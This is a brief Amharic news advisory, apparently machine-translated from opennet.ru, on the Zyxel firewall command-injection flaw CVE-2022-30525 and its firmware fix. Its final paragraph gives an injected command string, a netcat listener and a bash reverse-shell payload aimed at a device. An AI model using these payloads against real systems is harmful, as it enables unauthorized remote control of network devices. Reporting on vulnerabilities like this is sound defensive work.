ወሳኝ ተጋላጭነት (CVE-2022-30525) በኤቲፒ ፣ቪፒኤን እና USG FLEX ተከታታይ የፋየርዎል ፣የአይዲኤስ እና ቪፒኤን ስራዎችን በድርጅቶች ለማደራጀት በተዘጋጁ የዚክስል መሳሪያዎች ውስጥ ተለይቷል ፣ይህም የውጭ አጥቂ በኮዱ ላይ ኮድ እንዲሰራ ያስችለዋል። መሣሪያ ያለ የተጠቃሚ መብቶች ያለ ማረጋገጫ። ጥቃትን ለመፈጸም አጥቂ የኤችቲቲፒ/ኤችቲቲፒኤስ ፕሮቶኮልን በመጠቀም ወደ መሳሪያው ጥያቄዎችን መላክ መቻል አለበት። Zyxel በ ZLD 5.30 firmware ዝማኔ ውስጥ ያለውን ተጋላጭነት አስተካክሏል። እንደ ሾዳን አገልግሎት በአሁኑ ጊዜ በአለምአቀፍ አውታረመረብ ላይ በኤችቲቲፒ/ኤችቲቲፒኤስ በኩል ጥያቄዎችን የሚቀበሉ 16213 ተጋላጭ ሊሆኑ የሚችሉ መሳሪያዎች አሉ።
ክዋኔው የሚከናወነው በልዩ ሁኔታ የተነደፉ ትዕዛዞችን ለድር ተቆጣጣሪው /ztp/cgi-bin/handler በመላክ ነው፣ ያለማረጋገጫ ተደራሽ። ችግሩ የተፈጠረው በ lib_wan_settings.py ቤተ-መጽሐፍት ውስጥ ጥቅም ላይ የዋለውን የOS.system ጥሪን በመጠቀም እና የsetWanPortSt ኦፕሬሽንን በሚሰራበት ጊዜ በሲስተሙ ላይ ትዕዛዞችን በሚፈጽምበት ጊዜ የጥያቄ መለኪያዎችን በትክክል የማጽዳት ጉድለት ነው።
ለምሳሌ አንድ አጥቂ ገመዱን ማለፍ ይችላል "; ፒንግ 192.168.1.210; በስርዓቱ ላይ የ "ፒንግ 192.168.1.210" ትዕዛዝ እንዲፈፀም የሚያደርገው. የትእዛዝ ሼልን ለመድረስ በስርዓትዎ ላይ “nc -lvnp 1270” ን ማስኬድ እና ከዚያ ወደ መሳሪያው ጥያቄ በመላክ በግልባጭ ግንኙነት መጀመር ይችላሉ። bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'
ምንጭ: opennet.ru